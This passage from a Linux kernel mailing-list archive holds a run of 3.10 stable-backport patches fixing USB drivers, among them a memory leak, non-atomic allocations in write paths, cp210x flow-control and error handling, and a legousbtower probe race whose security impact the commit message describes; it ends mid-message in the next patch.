^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (8 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 109/319] usb: xhci: Fix panic if disconnect Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
                   ` (208 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alexey Klimov, Johan Hovold, Willy Tarreau

From: Alexey Klimov <klimov.linux@gmail.com>

commit 647024a7df36014bbc4479d92d88e6b77c0afcf6 upstream.

udriver struct allocated by kzalloc() will not be freed
if usb_register() and next calls fail. This patch fixes this
by adding one more step with kfree(udriver) in error path.

Signed-off-by: Alexey Klimov <klimov.linux@gmail.com>
Acked-by: Alan Stern <stern@rowland.harvard.edu>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/usb-serial.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/serial/usb-serial.c b/drivers/usb/serial/usb-serial.c
index 80d689f..faeb36d 100644
--- a/drivers/usb/serial/usb-serial.c
+++ b/drivers/usb/serial/usb-serial.c
@@ -1444,7 +1444,7 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[]
 
 	rc = usb_register(udriver);
 	if (rc)
-		return rc;
+		goto failed_usb_register;
 
 	for (sd = serial_drivers; *sd; ++sd) {
 		(*sd)->usb_driver = udriver;
@@ -1462,6 +1462,8 @@ int usb_serial_register_drivers(struct usb_serial_driver *const serial_drivers[]
 	while (sd-- > serial_drivers)
 		usb_serial_deregister(*sd);
 	usb_deregister(udriver);
+failed_usb_register:
+	kfree(udriver);
 	return rc;
 }
 EXPORT_SYMBOL_GPL(usb_serial_register_drivers);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (9 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 110/319] USB: serial: fix memleak in driver-registration error path Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
                   ` (207 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit 191252837626fca0de694c18bb2aa64c118eda89 upstream

Write may be called from interrupt context so make sure to use
GFP_ATOMIC for all allocations in write.

Fixes: 1da177e4c3f4 ("Linux-2.6.12-rc2")
Cc: stable <stable@vger.kernel.org>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/kobil_sct.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/kobil_sct.c b/drivers/usb/serial/kobil_sct.c
index 78b48c3..efa75b4 100644
--- a/drivers/usb/serial/kobil_sct.c
+++ b/drivers/usb/serial/kobil_sct.c
@@ -336,7 +336,8 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port,
 			port->interrupt_out_urb->transfer_buffer_length = length;
 
 			priv->cur_pos = priv->cur_pos + length;
-			result = usb_submit_urb(port->interrupt_out_urb, GFP_NOIO);
+			result = usb_submit_urb(port->interrupt_out_urb,
+					GFP_ATOMIC);
 			dev_dbg(&port->dev, "%s - Send write URB returns: %i\n", __func__, result);
 			todo = priv->filled - priv->cur_pos;
 
@@ -351,7 +352,7 @@ static int kobil_write(struct tty_struct *tty, struct usb_serial_port *port,
 		if (priv->device_type == KOBIL_ADAPTER_B_PRODUCT_ID ||
 			priv->device_type == KOBIL_ADAPTER_K_PRODUCT_ID) {
 			result = usb_submit_urb(port->interrupt_in_urb,
-								GFP_NOIO);
+					GFP_ATOMIC);
 			dev_dbg(&port->dev, "%s - Send read URB returns: %i\n", __func__, result);
 		}
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 112/319] USB: serial: mos7720: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (10 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 111/319] USB: kobil_sct: fix non-atomic allocation in write path Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
                   ` (206 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexey Khoroshilov, Johan Hovold, Willy Tarreau

From: Alexey Khoroshilov <khoroshilov@ispras.ru>

commit 5a5a1d614287a647b36dff3f40c2b0ceabbc83ec upstream.

There is an allocation with GFP_KERNEL flag in mos7720_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <khoroshilov@ispras.ru>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/mos7720.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/serial/mos7720.c b/drivers/usb/serial/mos7720.c
index 0f16bf6e..ddc71d7 100644
--- a/drivers/usb/serial/mos7720.c
+++ b/drivers/usb/serial/mos7720.c
@@ -1250,7 +1250,7 @@ static int mos7720_write(struct tty_struct *tty, struct usb_serial_port *port,
 
 	if (urb->transfer_buffer == NULL) {
 		urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
-					       GFP_KERNEL);
+					       GFP_ATOMIC);
 		if (urb->transfer_buffer == NULL) {
 			dev_err_console(port, "%s no more kernel memory...\n",
 				__func__);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 113/319] USB: serial: mos7840: fix non-atomic allocation in write path
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (11 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 112/319] USB: serial: mos7720: " Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
                   ` (205 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Alexey Khoroshilov, Johan Hovold, Willy Tarreau

From: Alexey Khoroshilov <khoroshilov@ispras.ru>

commit 3b7c7e52efda0d4640060de747768360ba70a7c0 upstream.

There is an allocation with GFP_KERNEL flag in mos7840_write(),
while it may be called from interrupt context.

Follow-up for commit 191252837626 ("USB: kobil_sct: fix non-atomic
allocation in write path")

Found by Linux Driver Verification project (linuxtesting.org).

Signed-off-by: Alexey Khoroshilov <khoroshilov@ispras.ru>
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/mos7840.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/serial/mos7840.c b/drivers/usb/serial/mos7840.c
index d060130..7df7df6 100644
--- a/drivers/usb/serial/mos7840.c
+++ b/drivers/usb/serial/mos7840.c
@@ -1438,8 +1438,8 @@ static int mos7840_write(struct tty_struct *tty, struct usb_serial_port *port,
 	}
 
 	if (urb->transfer_buffer == NULL) {
-		urb->transfer_buffer =
-		    kmalloc(URB_TRANSFER_BUFFER_SIZE, GFP_KERNEL);
+		urb->transfer_buffer = kmalloc(URB_TRANSFER_BUFFER_SIZE,
+					       GFP_ATOMIC);
 
 		if (urb->transfer_buffer == NULL) {
 			dev_err_console(port, "%s no more kernel memory...\n",
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (12 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 113/319] USB: serial: mos7840: " Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
                   ` (204 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Yoshihiro Shimoda, Felipe Balbi, Willy Tarreau

From: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>

commit 519d8bd4b5d3d82c413eac5bb42b106bb4b9ec15 upstream.

The previous driver is possible to stop the transfer wrongly.
For example:
 1) An interrupt happens, but not BRDY interruption.
 2) Read INTSTS0. And than state->intsts0 is not set to BRDY.
 3) BRDY is set to 1 here.
 4) Read BRDYSTS.
 5) Clear the BRDYSTS. And then. the BRDY is cleared wrongly.

Remarks:
 - The INTSTS0.BRDY is read only.
  - If any bits of BRDYSTS are set to 1, the BRDY is set to 1.
  - If BRDYSTS is 0, the BRDY is set to 0.

So, this patch adds condition to avoid such situation. (And about
NRDYSTS, this is not used for now. But, avoiding any side effects,
this patch doesn't touch it.)

Fixes: d5c6a1e024dd ("usb: renesas_usbhs: fixup interrupt status clear method")
Signed-off-by: Yoshihiro Shimoda <yoshihiro.shimoda.uh@renesas.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/renesas_usbhs/mod.c | 11 +++++++++--
 1 file changed, 9 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/renesas_usbhs/mod.c b/drivers/usb/renesas_usbhs/mod.c
index 6a030b9..254194d 100644
--- a/drivers/usb/renesas_usbhs/mod.c
+++ b/drivers/usb/renesas_usbhs/mod.c
@@ -272,9 +272,16 @@ static irqreturn_t usbhs_interrupt(int irq, void *data)
 	usbhs_write(priv, INTSTS0, ~irq_state.intsts0 & INTSTS0_MAGIC);
 	usbhs_write(priv, INTSTS1, ~irq_state.intsts1 & INTSTS1_MAGIC);
 
-	usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
+	/*
+	 * The driver should not clear the xxxSTS after the line of
+	 * "call irq callback functions" because each "if" statement is
+	 * possible to call the callback function for avoiding any side effects.
+	 */
+	if (irq_state.intsts0 & BRDY)
+		usbhs_write(priv, BRDYSTS, ~irq_state.brdysts);
 	usbhs_write(priv, NRDYSTS, ~irq_state.nrdysts);
-	usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);
+	if (irq_state.intsts0 & BEMP)
+		usbhs_write(priv, BEMPSTS, ~irq_state.bempsts);
 
 	/*
 	 * call irq callback functions
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 115/319] USB: change bInterval default to 10 ms
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (13 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 114/319] usb: renesas_usbhs: fix clearing the {BRDY,BEMP}STS condition Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
                   ` (203 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Alan Stern, Greg Kroah-Hartman, Willy Tarreau

From: Alan Stern <stern@rowland.harvard.edu>

commit 08c5cd37480f59ea39682f4585d92269be6b1424 upstream.

Some full-speed mceusb infrared transceivers contain invalid endpoint
descriptors for their interrupt endpoints, with bInterval set to 0.
In the past they have worked out okay with the mceusb driver, because
the driver sets the bInterval field in the descriptor to 1,
overwriting whatever value may have been there before.  However, this
approach was never sanctioned by the USB core, and in fact it does not
work with xHCI controllers, because they use the bInterval value that
was present when the configuration was installed.

Currently usbcore uses 32 ms as the default interval if the value in
the endpoint descriptor is invalid.  It turns out that these IR
transceivers don't work properly unless the interval is set to 10 ms
or below.  To work around this mceusb problem, this patch changes the
endpoint-descriptor parsing routine, making the default interval value
be 10 ms rather than 32 ms.

Signed-off-by: Alan Stern <stern@rowland.harvard.edu>
Tested-by: Wade Berrier <wberrier@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/core/config.c | 28 +++++++++++++++++-----------
 1 file changed, 17 insertions(+), 11 deletions(-)

diff --git a/drivers/usb/core/config.c b/drivers/usb/core/config.c
index b7ba1f9..3252bb2 100644
--- a/drivers/usb/core/config.c
+++ b/drivers/usb/core/config.c
@@ -213,8 +213,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 	memcpy(&endpoint->desc, d, n);
 	INIT_LIST_HEAD(&endpoint->urb_list);
 
-	/* Fix up bInterval values outside the legal range. Use 32 ms if no
-	 * proper value can be guessed. */
+	/*
+	 * Fix up bInterval values outside the legal range.
+	 * Use 10 or 8 ms if no proper value can be guessed.
+	 */
 	i = 0;		/* i = min, j = max, n = default */
 	j = 255;
 	if (usb_endpoint_xfer_int(d)) {
@@ -222,20 +224,24 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 		switch (to_usb_device(ddev)->speed) {
 		case USB_SPEED_SUPER:
 		case USB_SPEED_HIGH:
-			/* Many device manufacturers are using full-speed
+			/*
+			 * Many device manufacturers are using full-speed
 			 * bInterval values in high-speed interrupt endpoint
-			 * descriptors. Try to fix those and fall back to a
-			 * 32 ms default value otherwise. */
+			 * descriptors. Try to fix those and fall back to an
+			 * 8-ms default value otherwise.
+			 */
 			n = fls(d->bInterval*8);
 			if (n == 0)
-				n = 9;	/* 32 ms = 2^(9-1) uframes */
+				n = 7;	/* 8 ms = 2^(7-1) uframes */
 			j = 16;
 			break;
 		default:		/* USB_SPEED_FULL or _LOW */
-			/* For low-speed, 10 ms is the official minimum.
+			/*
+			 * For low-speed, 10 ms is the official minimum.
 			 * But some "overclocked" devices might want faster
-			 * polling so we'll allow it. */
-			n = 32;
+			 * polling so we'll allow it.
+			 */
+			n = 10;
 			break;
 		}
 	} else if (usb_endpoint_xfer_isoc(d)) {
@@ -243,10 +249,10 @@ static int usb_parse_endpoint(struct device *ddev, int cfgno, int inum,
 		j = 16;
 		switch (to_usb_device(ddev)->speed) {
 		case USB_SPEED_HIGH:
-			n = 9;		/* 32 ms = 2^(9-1) uframes */
+			n = 7;		/* 8 ms = 2^(7-1) uframes */
 			break;
 		default:		/* USB_SPEED_FULL */
-			n = 6;		/* 32 ms = 2^(6-1) frames */
+			n = 4;		/* 8 ms = 2^(4-1) frames */
 			break;
 		}
 	}
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (14 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 115/319] USB: change bInterval default to 10 ms Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
                   ` (202 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Dan Carpenter, Felipe Balbi, Willy Tarreau

From: Dan Carpenter <dan.carpenter@oracle.com>

commit f4693b08cc901912a87369c46537b94ed4084ea0 upstream.

We can't assign -EINVAL to a u16.

Fixes: 3948f0e0c999 ('usb: add Freescale QE/CPM USB peripheral controller driver')
Acked-by: Peter Chen <peter.chen@nxp.com>
Signed-off-by: Dan Carpenter <dan.carpenter@oracle.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/fsl_qe_udc.c | 7 ++-----
 1 file changed, 2 insertions(+), 5 deletions(-)

diff --git a/drivers/usb/gadget/fsl_qe_udc.c b/drivers/usb/gadget/fsl_qe_udc.c
index 9a7ee33..9fd2330 100644
--- a/drivers/usb/gadget/fsl_qe_udc.c
+++ b/drivers/usb/gadget/fsl_qe_udc.c
@@ -1881,11 +1881,8 @@ static int qe_get_frame(struct usb_gadget *gadget)
 
 	tmp = in_be16(&udc->usb_param->frame_n);
 	if (tmp & 0x8000)
-		tmp = tmp & 0x07ff;
-	else
-		tmp = -EINVAL;
-
-	return (int)tmp;
+		return tmp & 0x07ff;
+	return -EINVAL;
 }
 
 static int fsl_qe_start(struct usb_gadget *gadget,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (15 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 116/319] usb: gadget: fsl_qe_udc: signedness bug in qe_get_frame() Willy Tarreau
@ 2017-02-05 19:18 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
                   ` (201 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:18 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Konstantin Shkolnyy, Johan Hovold, Willy Tarreau

From: Konstantin Shkolnyy <konstantin.shkolnyy@gmail.com>

commit a377f9e906af4df9071ba8ddba60188cb4013d93 upstream.

A bug in the CRTSCTS handling caused RTS to alternate between

CRTSCTS=0 => "RTS is transmit active signal" and
CRTSCTS=1 => "RTS is used for receive flow control"

instead of

CRTSCTS=0 => "RTS is statically active" and
CRTSCTS=1 => "RTS is used for receive flow control"

This only happened after first having enabled CRTSCTS.

Signed-off-by: Konstantin Shkolnyy <konstantin.shkolnyy@gmail.com>
Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control")
[johan: reword commit message ]
Signed-off-by: Johan Hovold <johan@kernel.org>
[johan: backport to 4.4 ]
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/cp210x.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
index 0093261..d1582d8 100644
--- a/drivers/usb/serial/cp210x.c
+++ b/drivers/usb/serial/cp210x.c
@@ -793,7 +793,7 @@ static void cp210x_set_termios(struct tty_struct *tty,
 		} else {
 			modem_ctl[0] &= ~0x7B;
 			modem_ctl[0] |= 0x01;
-			modem_ctl[1] |= 0x40;
+			modem_ctl[1] = 0x40;
 			dev_dbg(dev, "%s - flow control = NONE\n", __func__);
 		}
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (16 preceding siblings ...)
  2017-02-05 19:18 ` [PATCH 3.10 117/319] USB: serial: cp210x: fix hardware flow-control disable Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
                   ` (200 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Greg Kroah-Hartman, James Patrick-Evans, Willy Tarreau

From: Greg Kroah-Hartman <gregkh@linuxfoundation.org>

commit 2fae9e5a7babada041e2e161699ade2447a01989 upstream.

This patch fixes a NULL pointer dereference caused by a race codition in
the probe function of the legousbtower driver. It re-structures the
probe function to only register the interface after successfully reading
the board's firmware ID.

The probe function does not deregister the usb interface after an error
receiving the devices firmware ID. The device file registered
(/dev/usb/legousbtower%d) may be read/written globally before the probe
function returns. When tower_delete is called in the probe function
(after an r/w has been initiated), core dev structures are deleted while
the file operation functions are still running. If the 0 address is
mappable on the machine, this vulnerability can be used to create a
Local Priviege Escalation exploit via a write-what-where condition by
remapping dev->interrupt_out_buffer in tower_write. A forged USB device
and local program execution would be required for LPE. The USB device
would have to delay the control message in tower_probe and accept
the control urb in tower_open whilst guest code initiated a write to the
device file as tower_delete is called from the error in tower_probe.

This bug has existed since 2003. Patch tested by emulated device.

Reported-by: James Patrick-Evans <james@jmp-e.com>
Tested-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: James Patrick-Evans <james@jmp-e.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/misc/legousbtower.c | 35 +++++++++++++++++------------------
 1 file changed, 17 insertions(+), 18 deletions(-)

diff --git a/drivers/usb/misc/legousbtower.c b/drivers/usb/misc/legousbtower.c
index 8089479..c3e9cfc 100644
--- a/drivers/usb/misc/legousbtower.c
+++ b/drivers/usb/misc/legousbtower.c
@@ -953,24 +953,6 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
 	dev->interrupt_in_interval = interrupt_in_interval ? interrupt_in_interval : dev->interrupt_in_endpoint->bInterval;
 	dev->interrupt_out_interval = interrupt_out_interval ? interrupt_out_interval : dev->interrupt_out_endpoint->bInterval;
 
-	/* we can register the device now, as it is ready */
-	usb_set_intfdata (interface, dev);
-
-	retval = usb_register_dev (interface, &tower_class);
-
-	if (retval) {
-		/* something prevented us from registering this driver */
-		dev_err(idev, "Not able to get a minor for this device.\n");
-		usb_set_intfdata (interface, NULL);
-		goto error;
-	}
-	dev->minor = interface->minor;
-
-	/* let the user know what node this device is now attached to */
-	dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
-		 "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
-		 USB_MAJOR, dev->minor);
-
 	/* get the firmware version and log it */
 	result = usb_control_msg (udev,
 				  usb_rcvctrlpipe(udev, 0),
@@ -991,6 +973,23 @@ static int tower_probe (struct usb_interface *interface, const struct usb_device
 		 get_version_reply.minor,
 		 le16_to_cpu(get_version_reply.build_no));
 
+	/* we can register the device now, as it is ready */
+	usb_set_intfdata (interface, dev);
+
+	retval = usb_register_dev (interface, &tower_class);
+
+	if (retval) {
+		/* something prevented us from registering this driver */
+		dev_err(idev, "Not able to get a minor for this device.\n");
+		usb_set_intfdata (interface, NULL);
+		goto error;
+	}
+	dev->minor = interface->minor;
+
+	/* let the user know what node this device is now attached to */
+	dev_info(&interface->dev, "LEGO USB Tower #%d now attached to major "
+		 "%d minor %d\n", (dev->minor - LEGO_USB_TOWER_MINOR_BASE),
+		 USB_MAJOR, dev->minor);
 
 exit:
 	dbg(2, "%s: leave, return value 0x%.8lx (dev)", __func__, (long) dev);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (17 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 118/319] usb: misc: legousbtower: Fix NULL pointer deference Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
                   ` (199 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit 6c83f77278f17a7679001027e9231291c20f0d8a upstream.

If we don't guarantee that we will always get an
interrupt at least when we're queueing our very last
request, we could fall into situation where we queue
every request with 'no_interrupt' set. This will
cause the link to get stuck.

The behavior above has been triggered with g_ether
and dwc3.

Reported-by: Ville Syrjälä <ville.syrjala@linux.intel.com>
Signed-off-by: Felipe Balbi <felipe.balbi@linux.intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/gadget/u_ether.c | 5 +++--
 1 file changed, 3 insertions(+), 2 deletions(-)

diff --git a/drivers/usb/gadget/u_ether.c b/drivers/usb/gadget/u_ether.c
index 4b76124..aad066d 100644
--- a/drivers/usb/gadget/u_ether.c
+++ b/drivers/usb/gadget/u_ether.c
@@ -586,8 +586,9 @@ static netdev_tx_t eth_start_xmit(struct sk_buff *skb,
 
 	/* throttle high/super speed IRQ rate back slightly */
 	if (gadget_is_dualspeed(dev->gadget))
-		req->no_interrupt = (dev->gadget->speed == USB_SPEED_HIGH ||
-				     dev->gadget->speed == USB_SPEED_SUPER)
+		req->no_interrupt = (((dev->gadget->speed == USB_SPEED_HIGH ||
+				       dev->gadget->speed == USB_SPEED_SUPER)) &&
+					!list_empty(&dev->tx_reqs))
 			? ((atomic_read(&dev->tx_qlen) % qmult) != 0)
 			: 0;
 
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (18 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 119/319] usb: gadget: function: u_ether: don't starve tx request queue Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling Willy Tarreau
                   ` (198 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johan Hovold, Willy Tarreau

From: Johan Hovold <johan@kernel.org>

commit de24e0a108bc48062e1c7acaa97014bce32a919f upstream.

The current tiocmget implementation would fail to report errors up the
stack and instead leaked a few bits from the stack as a mask of
modem-status flags.

Fixes: 39a66b8d22a3 ("[PATCH] USB: CP2101 Add support for flow control")
Signed-off-by: Johan Hovold <johan@kernel.org>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 drivers/usb/serial/cp210x.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/drivers/usb/serial/cp210x.c b/drivers/usb/serial/cp210x.c
index d1582d8..003f8dd 100644
--- a/drivers/usb/serial/cp210x.c
+++ b/drivers/usb/serial/cp210x.c
@@ -853,7 +853,9 @@ static int cp210x_tiocmget(struct tty_struct *tty)
 	unsigned int control;
 	int result;
 
-	cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+	result = cp210x_get_config(port, CP210X_GET_MDMSTS, &control, 1);
+	if (result)
+		return result;
 
 	result = ((control & CONTROL_DTR) ? TIOCM_DTR : 0)
 		|((control & CONTROL_RTS) ? TIOCM_RTS : 0)
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 121/319] usb: gadget: u_ether: remove interrupt throttling
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (19 preceding siblings ...)
  2017-02-05 19:19 ` [PATCH 3.10 120/319] USB: serial: cp210x: fix tiocmget error handling Willy Tarreau
@ 2017-02-05 19:19 ` Willy Tarreau
  2017-02-05 19:19 ` [PATCH 3.10 122/319] usb: chipidea: move the lock initialization to core file Willy Tarreau
                   ` (197 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:19 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felipe Balbi, Willy Tarreau

From: Felipe Balbi <felipe.balbi@linux.intel.com>

commit fd9afd3cbe404998d732be6cc798f749597c5114 upstream.

According to Dave Miller "the networking stack has a
hard requirement that all SKBs which are transmitted
